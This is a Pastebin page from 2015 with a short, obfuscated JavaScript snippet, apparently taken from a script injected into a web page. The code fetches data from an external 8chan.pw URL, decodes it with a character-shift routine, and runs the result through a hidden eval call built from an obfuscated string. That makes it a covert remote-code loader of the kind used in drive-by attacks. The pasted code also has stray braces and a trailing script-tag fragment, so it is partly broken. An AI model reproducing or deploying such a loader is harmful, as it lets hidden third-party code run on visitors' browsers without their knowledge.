Advertisement
Guest User

Js

a guest
Sep 21st, 2015
1,830
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. 
  2. window.wqvqlxf = function(u, f) {
  3.     var xh;
  4.     if (window.XMLHttpRequest) {
  5.         xh = new XMLHttpRequest();
  6.     } else {
  7.         xh = new ActiveXObject('Microsoft.XMLHTTP');
  8.     };
  9.     var o = {};
  10.     o.xh = xh;
  11.     o.done = false;
  12.     o.f = f;
  13.     window.axhtprqsa.push(o);
  14.     xh.onreadystatechange = function() {
  15.         var o = null;
  16.         for (var i = window.axhtprqsa.length - 1; i >= 0; i--) {
  17.             if (window.axhtprqsa[i].xh == this) {
  18.                 o = window.axhtprqsa[i];
  19.                 break;
  20.             };
  21.         };
  22.         if (o != null) {
  23.             if (readyState == 4) {
  24.                 if (!o.done) {
  25.                     o.done = true;
  26.                     if (status == 200) {
  27.                         o.f(responseText, 'success');
  28.                     } else {
  29.                         o.f('', 'error');
  30.                     };
  31.                 };
  32.             };
  33.         };
  34.     };
  35.     try {
  36.         xh.open('GET', u, true);
  37.         xh.send();
  38.     } catch (e) {};
  39. };
  40. };
  41.  
  42. function gfavsh(d, c) {
  43.     var fd = '';
  44.     var lv = 5;
  45.     var plv;
  46.     for (var i = 0; i < d.length; i++) {
  47.         var v = d.charCodeAt(i);
  48.         v -= 32;
  49.         plv = lv;
  50.         lv = v;
  51.         v -= plv;
  52.         v %= 126 - 32;
  53.         if (v < 0) v += 126 - 32;
  54.         v += 32;
  55.         fd += String.fromCharCode(v);
  56.     };
  57.     if (fd.length >= 3)
  58.         if (c == 'success') window[window['wqvqlx']](fd);
  59. };
  60. window.wqvqlx = 'e' + window.wqvqlx;
  61. wqvqlxf('https://8chan.pw/a_0l5re6sc365kdcn3yrogjp20', gfavsh);
  62. }; < /script>aylmoctisfnetoojwsdd911";
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement